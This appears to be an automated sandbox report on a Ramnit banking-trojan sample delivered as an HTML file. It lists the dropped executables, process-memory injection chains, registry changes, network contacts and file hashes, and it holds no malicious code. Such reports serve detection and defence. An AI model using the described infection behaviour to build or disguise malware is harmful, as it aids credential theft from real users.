Malware Analysis Report

2025-01-19 07:17

Sample ID 240531-fhfd6agf89
Target 8605e735f755b19186b654efc2857890_JaffaCakes118
SHA256 1d69bcbc72a131a4d03aedb66bfc6a0e0f6dbfc97e46f675f12b606cf17a1ed1
Tags
ramnit banker spyware stealer trojan upx worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1d69bcbc72a131a4d03aedb66bfc6a0e0f6dbfc97e46f675f12b606cf17a1ed1

Threat Level: Known bad

The file 8605e735f755b19186b654efc2857890_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

ramnit banker spyware stealer trojan upx worm

Ramnit

UPX packed file

Loads dropped DLL

Executes dropped EXE

Drops file in Program Files directory

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-31 04:52

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 04:52

Reported

2024-05-31 04:54

Platform

win7-20240508-en

Max time kernel

121s

Max time network

131s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\8605e735f755b19186b654efc2857890_JaffaCakes118.html

Signatures

Ramnit

trojan spyware stealer worm banker ramnit

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft\px229E.tmp C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File created C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000587104b0d2f7da409208cf3ae9e77a230000000002000000000010660000000100002000000060ebbcf521ab535309f3e10066055825db27e6778e0c7365c69781e103a4cea1000000000e8000000002000020000000bcef6a70ca26f58f9994b136605365959622a1c1831f99a8d6b2bcd6d7889a63900000006fc47ae79b03fdfaca08ac26e9508a8f91256bb597027cf490c167e9ff60ca2a7ff798d58aeda69b9410ff0b19fc2688420e21f25472c3941385b10f3e3288843efac5e58ae974917d38f793dba7fb74002ad8be7dfb74d7ca4a5fb3128db40329f1f93f5b7d08d878dcb38c2c8b428fe5bfd2b06530eadd17b5eb3154c0ac7f32accbc0e00b98c284155c07b85c289540000000123bc25b61997aca8105fb4f7bdc2d72339f342f15bf05abfd9e4eb1254abcaa2d34cf790a83fa4eac4fb999d5a456a29edb6494a6204d50ce2860c7db3eba90 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 406fea6016b3da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423293000" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000587104b0d2f7da409208cf3ae9e77a23000000000200000000001066000000010000200000009faf928a2475db129d7d6c883bc706e59add0115455d6be6f395969f13dd6a19000000000e8000000002000020000000f3f3c07c50efed74c222020f56c47ff0e886079dd5a5e95d31441fd9aa6cdaaa20000000b95ba2006387bafb1779ba6d90c737e70e96ce7b50cd5c461aec17fb41e07322400000002fd69e80865e0c2d41b180552fa9c95aa0e6946ae54eea28ed021f13373a701763b80668b52613e638c2a69d1dd2bc7635a57ded2fe7f643f9dcd5619f10f5c4 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8BE685D1-1F09-11EF-931A-4205ACB4EED4} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 328 wrote to memory of 1908 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 328 wrote to memory of 1908 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 328 wrote to memory of 1908 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 328 wrote to memory of 1908 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1908 wrote to memory of 2724 N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 1908 wrote to memory of 2724 N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 1908 wrote to memory of 2724 N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 1908 wrote to memory of 2724 N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2724 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Program Files (x86)\Microsoft\DesktopLayer.exe
PID 2724 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Program Files (x86)\Microsoft\DesktopLayer.exe
PID 2724 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Program Files (x86)\Microsoft\DesktopLayer.exe
PID 2724 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Program Files (x86)\Microsoft\DesktopLayer.exe
PID 2660 wrote to memory of 2520 N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2660 wrote to memory of 2520 N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2660 wrote to memory of 2520 N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2660 wrote to memory of 2520 N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 328 wrote to memory of 2548 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 328 wrote to memory of 2548 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 328 wrote to memory of 2548 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 328 wrote to memory of 2548 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\8605e735f755b19186b654efc2857890_JaffaCakes118.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:328 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Program Files (x86)\Microsoft\DesktopLayer.exe

"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:328 CREDAT:209933 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.bing.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 ff5e1f27193ce51eec318714ef038bef
SHA1 b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6
SHA256 fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320
SHA512 c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a

memory/2724-9-0x0000000000230000-0x000000000023F000-memory.dmp

memory/2724-8-0x0000000000400000-0x000000000042E000-memory.dmp

memory/2660-18-0x0000000000400000-0x000000000042E000-memory.dmp

memory/2660-16-0x0000000000240000-0x0000000000241000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab3747.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Cab37CA.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar37DC.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 80cf85fab356d5924eef59ab648adf99
SHA1 cfcde2e8741379d125f85620c5cc07f9cd568b2f
SHA256 21892fb61d99ab541bb2876452e69cb7db88a14871d5a0c32c33bbd8ecbf353a
SHA512 8e68a95fd683d3284349448c90d3d3bb1ffecff7ed5ebab863fac1462bb180e8879e4deed88e7a2701bd2ee85996f518860a9cf168b92e7ea73f775356387681

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 10921551ae8a7ddda979c137e755fb5e
SHA1 c570fb778422362966e6d63537c386569ea6d69f
SHA256 a4db6e8be03eda3c90b215a4eb14e56ddb7789de1d0984482b86717f35395193
SHA512 aff295edfb8449fa17274dfa856803a734d24b1b07246682d78b50e80239e48cf869ec336a316c0b53bd9e41b8476072cb4b7de265793f7a5025c8de1f2dbe2c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 22d0dccc69f0d14a07500050efa55ef2
SHA1 bcbb5cd56715e516bfc386f874c9080ad47d5897
SHA256 de5022009e55c1b80500859c88d489a6a3e24a8e56c0d481b7fdb523455d713f
SHA512 e67ef219f87970a2180cb055359a8d739edd1fa173bb2b0c1291210845925e39356c049136d74bf52d4a5d301ed2a5f51e8754608cf9591fbc98ba0c2cae5da0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 07b0a0a12e450074f0c805fdfc8628e6
SHA1 240474db5c2381524446e99bf45c06aa83b43ae9
SHA256 11f99a9da38e88f3f71268e4406fcfcc6a16ba387c317bf436fd9f85b98e7cdb
SHA512 5063ddf22ef933d0571c025f859c136b803cc4416e441a107ea3e439f7824c13ec084b0490aab6bd565bc2aa65c1f0d1980d9141b486c8eea29e2e9f4cbc763a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a007ab62554f5d52ec8190502f92a33a
SHA1 8f391774b1a449c21b01f1bd4458be2fec6c2369
SHA256 2187b8656f8667d5e55a6c9bacd25a6a957bda539cb04016d1ccd6dfb27aa485
SHA512 d9f92945479b5078e45cd2a2bcb8b9bfe0870beb88e0e2a6d920f429669c8d18932ef6db0c7f41309f18729598dc414ccc3c2a15cb2fc70dc46f53430d368b8c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d0cd7ded44985e9eb3bf6beeeb95a9be
SHA1 73d91e6cad69c4c0d4a7adfe3f17e313ad9c824b
SHA256 cf392cf390fc999ef69603d87fb6704db2e8067faaa7c5299d0a483c1d7d5bd8
SHA512 838309b18db92f4bb128b53d8b4fc8872a81edbf58b0dd0acc834f90325c9aaa5dea073143b651b9a13c4ab02b773c78d94576e5781687d09b258bfb50082205

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3794d0e58dcb49ea2ebc75bb1b832aa8
SHA1 19a47fc7418653591d7dc17a2135c33d626e3c45
SHA256 5073cbb495135a047e750b19b1b2b10303a3c7f118dc1f525f42513d8faeb877
SHA512 771284c6099d1d6f8ff53fda6e24c335d54b9376aae06d02b3b3f45a78da5fb8e3c8441c05888751dc61ea86780652c338b1430f5423449dd5b9a1a36f37c0b9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2ee043931b530250039f4ff14a766466
SHA1 e36e5dd19ed959c30c482bc24fc9a53800c68042
SHA256 3bbd74c866e5605513978aad93d10ded074dd3c6f4d6bbc026c4cbd02a59554b
SHA512 394a58f7e416bc5768397fb1da2fa29d3e6c5ac7cf59555eaffe7ca444f2e628abc18f7f0ebfe4b904c103c7494bd526b5cecd62d2719a60e9632227e33d4cd1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c1dca4bfa2174024d5bd4796fb62b6c5
SHA1 9deccd55a8f66413f789f9e8306b374e5d9f9597
SHA256 0c931d867570be93f5d1976b14c333311b2b14f37d8a4e5191a6187f2053c943
SHA512 bd56a279393959dc611fabf3e1ea32e74859cb8337e21067f0d9df5fe882955ef2294ea23bf971f013bf9e96a5aa841afa8da865a7d4ca6da04a6b770f0bc2be

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 84c4ebc704a3aecfdd2681e40c69771b
SHA1 38a36f0a2fa823732cc3f8fe1226cc09efa1a2c0
SHA256 5ffe3fc45fcd1fbc55981982759370f0b1e63e2dfb9906d7f5ed421ecc295010
SHA512 97ad84f3f041f0cd5d95d11da7b0362f8b19cd2edca4e4db11da985ee784260dfc01046d3dc5c5efadc936184326bdbe1d684369ff3ac4942d6a833403a5f6d2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c2a77ec288649d2fc5bce1c80ffc6a44
SHA1 e014d37f180d8a8cbfd5db30b205acba828f94fe
SHA256 0f360fbfcaa17b9397f380e1ca7aef48c2ad5ed5050078c721bf9ea99e827ac3
SHA512 d82281b07d0d894a3b0ace21673b1481d479d5f7789ae6f1eea71b7d66e9338e8c1fdee93cc2437b17362423a80cb023d836efc7140c7d44694bbe3e63b85bd5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2dafd0aa6aa3cf2e4f3caca66471fd30
SHA1 b78e29dabe713d2483f91f49631a24bf086ef8c4
SHA256 cbcb8d50afb0699aeb656ec63c12b108e3725f84eef781490591c6bd9b14ed94
SHA512 68fa912ff72fffd9796ce6e4a54b108446c5eab4e99295ebd8362e09bdf3b4e602853091cb2de39cdb2c7a21dd81dbd620476fa11105ab1a0394e9c986e1cfd0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8b5af42895c74545c218c60c808ee669
SHA1 65168951d9393cb19905ed2432af301df8bac6f9
SHA256 d350b764a36172919570e95afc0d9873b24aee9afc70d9b96eb3091644fd63b0
SHA512 4c96c799ee44cca9dbb65f6922b7df7bf9fcde14789a85a387e3eb23e2b1ca44ebdda767775bf649bf3e86638e96c5555eee564cdbe9dbc30d6d1d59d533c59a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 69d4585c8e75b14bee77472e025d6d3b
SHA1 79128b6b68fde9a05d5b9a800a1c28d45b439bdc
SHA256 55390159922faec91d83d8ad7c574d11e3542deec3b5086ec1ed0e7623c74c69
SHA512 e706079f66a54434fde42c6027d8eb83f2c9c9f9050ac72de3de67fc36043806cb9405c0625fd9c2c7c5848b46cb704c444ef26b1e21b53f09802d8d25200307

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 183e0be3776536c0892da5a6cd7588ca
SHA1 99183db35f2a56734f9908b4e435798d9d31df77
SHA256 1ac4b15507b2fecb532d5292413bfb740c51abd5ffd607fa05dbfe7cb2886862
SHA512 f061b9c0d9222cf1502ca748a098b563945a4ee034628028113e650ddabfde3e773e08b7880a81221502aa48f81a49c85d3c987bea2eed30a7cffb85699becc0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bcaa0aa2a5208cd4c6ec40edd195b16c
SHA1 f56179b5dd6cd3c0aa84d23228cb1268bd24742c
SHA256 57bb0d863d8c178c80faa81405648201cbf68ac1b83e487b7c1ebff389921177
SHA512 e84aefd6a0d32dc7a8cb17f7cd236de342610398cb6571310ad17bc2357b3ac034f91714057366e4dda750a6a96c3696c36b77efd77a6a16a80d6f2d86b0a846

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f7cb36460ab0e1e0766334d217e56913
SHA1 da419ded8ace4c4d971fda605c1f97cb71a462d3
SHA256 64e70229ac4f1ef6b7c3e32e799bbc6f9bf717e42fd872a04a797c1b4e26b61b
SHA512 9252c8d4e7b40fb94cc2bb2294882e1f2f6b33b2de91b1349aa34625eebb8bc8729e69993e79b0f3cacfd7a9f01227b9a689fa691c342d8bdd3fc09dd550db26

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7db53b8abe1157b08f1c249e80b354cd
SHA1 a542cb32b2ca1786d12299b836124588afba6e1c
SHA256 8bbb4d14531e7fd08bbd0050b28e1c2eb1c755b2b6227c00dbac2c42f029f357
SHA512 7e0178ffb1b5197fb02f15d00229129a069f8ef4f9c3628c7a405738038fa63d8949aaca1857cbe6573e7e648b9c60ab1b81773cfc15d34a0f982152f2c08e61

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ec2001e2631209fd0af4464b6cf41ad8
SHA1 f25f3b444dbd32ed209ae4bd7c61b4deadee44dc
SHA256 8b5854d115932e67facb46a033ec8982e7583b369f2feb7161fa67d846357610
SHA512 84343c4defb85e43f133c3f4fed46a06e9f9ce4c717e318e7506dd625542671a1c5cc8fdae26acdf163203d4bcc512c4f82256d7b7dc815fc3b8674b6ace4397

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0fddc99f343e9f8ff114271d53bbedbf
SHA1 78819f24425ed9912e05f8cb233ac13849cdcaed
SHA256 56235d8424ec4d6b9d3c479f65e49d45a4efa85bbf2e7862d31a1c4476c23388
SHA512 9406f3b27df7b6ae45cb0c5ffcf8e524997557c04d2ebf889691a4cba69a6e213d92317cba606b9687be450a2ff22c15a5536cc0a95ef64f6446370a7ef31c14

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fbf03bcc81d06e9482ade767b887f42c
SHA1 ca949e087b29dd6eca5f55e3bbbf4c7f625a2253
SHA256 8e059499a99d7bb9a478d0dffbc5774d0ba33ad272dd04ab94b7dbbf94b43c6e
SHA512 31566880089f9c612b1fb0146299083246dc9069415b57769d86878e16d54e2fab95a7dbe0a0b70a1011120fd4ef9f442be690e95c94fbed7e9b5fb86b756f23

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2a02dec2c70d856d3a91e61cb0ffeb82
SHA1 3839d8c87f5acc803e5614daec11f2b5f5e20720
SHA256 6bc6f8dd94937c2f5722c8fbdf63ba5f0fda9d7f50939a66a740dc6bf1e4f6a7
SHA512 cf4b377324842949e731cfb21a85d380407adf6211b12c3c24c3bf1b6c1d1ee1f146501ec6ba053251cd6e0e7c9ef4d8046683bbdc1b9ca6e5cdde9ee32ce776

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-31 04:52

Reported

2024-05-31 04:55

Platform

win10v2004-20240226-en

Max time kernel

140s

Max time network

152s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\8605e735f755b19186b654efc2857890_JaffaCakes118.html

Signatures

N/A

